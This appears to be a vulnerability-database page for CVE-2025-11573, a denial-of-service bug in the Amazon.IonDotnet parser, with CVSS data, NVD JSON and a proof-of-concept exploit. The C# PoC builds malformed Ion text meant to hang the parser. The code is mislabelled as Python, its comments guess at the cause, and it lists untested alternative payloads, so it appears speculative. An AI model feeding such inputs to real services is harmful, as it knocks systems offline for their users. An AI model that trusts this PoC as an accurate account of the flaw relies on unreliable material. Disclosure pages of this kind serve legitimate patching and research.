Security Vulnerability Report
中文
CVE-2025-11573 CVSS 7.5 HIGH

CVE-2025-11573

Published: 2025-10-09 18:15:50
Last Modified: 2026-04-15 00:35:42
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

An infinite loop issue in Amazon.IonDotnet library versions <v1.3.2 may allow a threat actor to cause a denial of service through a specially crafted text input. To mitigate this issue, users should upgrade to version v1.3.2. As of August 20, 2025, this library has been deprecated and will not receive further updates.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Amazon.IonDotnet < v1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11573 PoC - Amazon.IonDotnet Infinite Loop DoS // This PoC demonstrates triggering an infinite loop in Amazon.IonDotnet < v1.3.2 // by providing a specially crafted Ion text input that causes the parser to loop indefinitely. using System; using System.IO; using System.Text; using Amazon.IonDotnet; class Program { static void Main(string[] args) { // Crafted Ion text input designed to trigger infinite loop in the parser. // The malformed symbol token or unterminated string literal causes // the text reader's state machine to loop without making progress. string maliciousInput = "'''" + new string('\\', 10000) + "u{'a':"; // Alternative: unterminated string with escape sequences // string maliciousInput = "\"" + new string('\\', 10000) + "u"; // Alternative: deeply nested or malformed structure // string maliciousInput = "{\"a\":" + new string('(', 100000) + "1" + new string(')', 100000); try { using (var reader = new MemoryStream(Encoding.UTF8.GetBytes(maliciousInput))) { // This call will hang indefinitely due to infinite loop in parser using (var ionReader = IonReaderBuilder.Build(reader)) { // The parser enters an infinite loop during MoveNext() // and never returns, causing denial of service Console.WriteLine("Starting to parse malicious input..."); while (ionReader.MoveNext() != IonType.None) { // Parser is stuck in infinite loop here Console.WriteLine("This line will never be reached"); } } } } catch (Exception ex) { Console.WriteLine($"Exception: {ex.Message}"); } } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11573", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-09T18:15:49.543", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An infinite loop issue in Amazon.IonDotnet library versions <v1.3.2 may allow a threat actor to cause a denial of service through a specially crafted text input.\n\nTo mitigate this issue, users should upgrade to version v1.3.2. As of August 20, 2025, this library has been deprecated and will not receive further updates."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1286"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-022/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/amazon-ion/ion-dotnet/releases/tag/v1.3.2", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/amazon-ion/ion-dotnet/security/advisories/GHSA-q5r6-9qwq-g2wj", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.